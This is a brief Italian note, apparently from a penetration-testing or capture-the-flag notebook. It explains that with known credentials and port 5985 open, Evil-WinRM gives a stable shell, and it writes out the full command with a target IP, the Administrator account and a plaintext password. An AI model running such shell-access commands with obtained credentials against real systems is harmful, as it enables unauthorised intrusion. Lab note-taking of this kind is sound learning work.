tags: Evil-WinRM Windows Windows_Reverse_Shell
Nel caso possedessimo le credenziali e la porta 5985 fosse aperta il miglior modo per avere una reverse shell stabile è quello di usare questo programma in questo modo:
evil-winrm -i 10.129.37.56 -u Administrator -p 'MEGACORP_4dm1n!!'